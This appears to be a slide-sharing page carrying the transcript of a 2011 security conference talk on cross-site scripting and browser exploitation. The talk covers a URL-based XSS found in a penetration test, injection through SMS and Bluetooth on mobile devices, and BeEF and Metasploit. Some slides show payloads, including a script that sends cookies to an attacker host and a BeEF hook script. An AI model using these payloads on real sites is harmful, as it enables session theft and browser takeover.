The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Fact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMsFact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMs
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 

Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]

  • 1. www.taddong.com Browser Exploitation for Fun and Profit Revolutions (…in less than 24 hours ) Raúl Siles raul@taddong.com March 4, 2011 Copyright © 2011 Taddong S.L. All rights reserved.
  • 2. Outline •  On previous episodes… (3rd on the series) •  XSS state-of-the-art (≈ WCI) •  “New” kind of XSS: –  Global (or URL-based) non-persistent XSS •  Multi-technology WCI on mobile devices •  Browser exploitation through XSS –  BeEF + Metasploit + attacker’s imagination •  References Copyright © 2011 Taddong S.L. www.taddong.com 2
  • 3. On Previous Episodes… •  “Browser Exploitation for Fun & Profit” –  Target: Web browser (& its plug-ins) –  Web application pen-tester setup & Demos –  Samurai WTF & BeEF & Metasploit http://blog.taddong.com/2010/11/browser-exploitation-for-fun-profit.html •  “Browser Exploitation for Fun & Profit Reloaded” –  Top vuln applications 2010: Java & Adobe –  Updating to the Ruby-based BeEF version –  Web browsing best practices http://blog.taddong.com/2010/12/browser-exploitation-for-fun-profit.html Copyright © 2011 Taddong S.L. www.taddong.com 3
  • 4. XSS State-of-the-Art Copyright © 2011 Taddong S.L. www.taddong.com 4
  • 5. Can My Browser Be Attacked? •  You only need to visit a single malicious web page… and be vulnerable to a single flaw… on your web browser or any of the installed plug-ins or add-ons… and … Trusted websites attacking you •  Drive-by-XSS Lots of attack vectors… such as XSS Copyright © 2011 Taddong S.L. www.taddong.com 5
  • 6. Cross-Site Scripting (XSS) •  XSS (JavaScript) –  Why not “web content injection” (WCI)? –  Others: HTML, images, Java, Flash, ActiveX… •  XSS types –  Non-persistent & Persistent & … •  Risk/Impact perception: Low –  Industry & pen-tests Copyright © 2011 Taddong S.L. www.taddong.com 6
  • 7. Who is (not) vulnerable to XSS? xssed.com Copyright © 2011 Taddong S.L. www.taddong.com 7
  • 8. “New” kind of XSS: Global (or URL-based) Non-Persistent XSS Copyright © 2011 Taddong S.L. www.taddong.com 8
  • 9. Traditional XSS Protections •  Enforce input validation and output encoding –  GET & POST parameters –  HTTP headers GET /portal?lang=es&q=rootedcon&year=2011 HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Referer: http://www.example.com/main ... Copyright © 2011 Taddong S.L. www.taddong.com 9
  • 10. Target Web Application •  Initially discovered during a real web application pen-test in Spain •  Multi-language support web-app –  Top HTML header includes links to the other languages (on every web page): URL https://www.example.com/portal/ […params] <UL class=cabecera_idiomas> <LI><a href="https://www.example.com/portal/?lang=es"> Bienvenidos</a></LI> <LI><a href="https://www.example.com/portal/?lang=en"> Welcome</a></LI> ...</UL> Copyright © 2011 Taddong S.L. www.taddong.com 10
  • 11. Global (or URL-based) non- persistent XSS (1) •  HTML or script injection after the “?” without parameters https://www.example.com/portal/?"><script> document.location='https://www.attacker.com/triqui.php? c='+document.cookie</script> •  The script is reflected N-times on the web page received as the response –  One per language (by default) •  Similar scenario before the “?” (URL) or between parameters Copyright © 2011 Taddong S.L. www.taddong.com 11
  • 12. Global (or URL-based) non- persistent XSS (2) •  Global: All web application resources (URLs) are vulnerable to XSS –  Not a specific HTTP parameter –  Better for: •  Obfuscation (long URLs) •  Social engineering •  More damaging attacks (e.g. web login page) •  Defenses: input validation and output encoding on everything (including the URL) Copyright © 2011 Taddong S.L. www.taddong.com 12
  • 13. Multi-technology WCI (≈XSS) on Mobile Devices Copyright © 2011 Taddong S.L. www.taddong.com 13
  • 14. XSS Everywhere •  XSS: the input is reflected on the output –  Immediately or “somewhere in time” •  Any input is a potential vulnerable candidate, as well as any output •  Web content injection (≈XSS) through multiple technologies on mobile devices –  SMS and Bluetooth What about… Wi-Fi, 2G/3G, etc? (network name) Copyright © 2011 Taddong S.L. www.taddong.com 14
  • 15. SMS •  Initially discovered on Palm WebOS –  Open web sites, download files, install new root CA certs, turn off radio, or wipe device •  Extended to Windows Mobile & HTC –  Web-based SMS preview capabilities on HTC Windows Mobile smart-phones (scripting) •  http://www.securityfocus.com/archive/1/510897/30/ •  Defenses: Disable preview or update http://intrepidusgroup.com/insight/webos/ Copyright © 2011 Taddong S.L. www.taddong.com 15
  • 16. SMS on Windows Mobile 6.5 From: 666123666 To: 6001234567 Mensaje (SMS): <script>alert ('Ejecucion de Javascript')</ script> Copyright © 2011 Taddong S.L. www.taddong.com 16
  • 17. Bluetooth •  Discovered on Windows Mobile 6.1 –  Native web-based GUI notification subsystem •  Bluetooth pairing and profile access –  Bluetooth authorization message (<=32 chars) –  Only HTML (no scripting): Blueline attacks •  Defenses: Customized notification subsystem (vendor based) http://www.hackingexposedwireless.com Copyright © 2011 Taddong S.L. www.taddong.com 17
  • 18. Bluetooth on Windows Mobile 6.1 # hciconfig hci0 name "<b>Ordenador</b> no peligro<i>so</i>" # hciconfig hci0 name "Mantener Bluetooth activo?<br><p" Copyright © 2011 Taddong S.L. www.taddong.com 18
  • 19. Root Cause of the Problem •  Web contents everywhere (or converted to) •  Information displayed (GUI) via a web- based engine (HTML, JavaScript & more) Databases Web-App Copyright © 2011 Taddong S.L. www.taddong.com 19
  • 20. Near Future Vulnerable Inputs •  Camera: Barcode or QR code reader, etc •  Microphone: HTML-based audio transcript Copyright © 2011 Taddong S.L. www.taddong.com 20
  • 21. Browser Exploitation through XSS Copyright © 2011 Taddong S.L. www.taddong.com 21
  • 22. Demonstrating XSS •  Most common example:  –  Quick for XSS discovery but… <script>alert(‘XSS’)</script> How to contribute to change this general perception? Copyright © 2011 Taddong S.L. www.taddong.com 22
  • 23. Live Demo Copyright © 2011 Taddong S.L. www.taddong.com 23
  • 24. Exploiting Java CVE-2010-0886 •  All vulnerability details are on previous episodes –  Java 6 Update (10 =< x <= 19) •  “Do you know Rubén Santamarta?”  •  Exploit requirements: –  Metasploit running as root (sudo) –  SMB not running on pen-tester system –  WebClient (WebDAV Mini-Redirector) running on target (by default) –  WEBDAV requires SRVPORT=80 and URIPATH=/ (BeEF is running there!! Use != IP addresses) exploit/windows/browser/java_ws_arginject_altjvm Copyright © 2011 Taddong S.L. www.taddong.com 24
  • 25. BeEF Exploitation •  This is the only script the attacker needs to inject in the target web application: (PHP) <script src="http://www.attacker.com/ beef/hook/beefmagic.js"></script> •  Metasploit integration •  Persistent hooking (100% iframe) –  URL limitation (& favicon) – Yori Kvitchko –  Not in some mobile devices… Copyright © 2011 Taddong S.L. www.taddong.com 25
  • 26. Persistent Hooking in Mobile Devices through URL hiding •  URL hiding or addr. bar replacement •  UI spoofing Safari on the iPhone –  JavaScript pushes real address bar up •  Android too http://evil-lemur.com/mobile/ http://software-security.sans.org/blog/2010/11/29/ui- spoofing-safari-iphone Copyright © 2011 Taddong S.L. www.taddong.com 26
  • 27. References •  Presentations in the Browser Exploitation for Fun & Profit Series: http://blog.taddong.com •  Samurai WTF (Web Testing Framework): –  http://sourceforge.net/projects/samurai/ •  BeEF –  http://www.bindshell.net/tools/beef/ –  https://code.google.com/p/beef/ •  MetaSploit Framework (MSF): (autopwn) –  http://www.metasploit.com –  http://www.metasploit.com/framework/modules/ Copyright © 2011 Taddong S.L. www.taddong.com 27
  • 28. Questions?  Copyright © 2011 Taddong S.L. www.taddong.com 28
  • 29. www.taddong.com Blog: blog.taddong.com Twitter: @taddong raul@taddong.com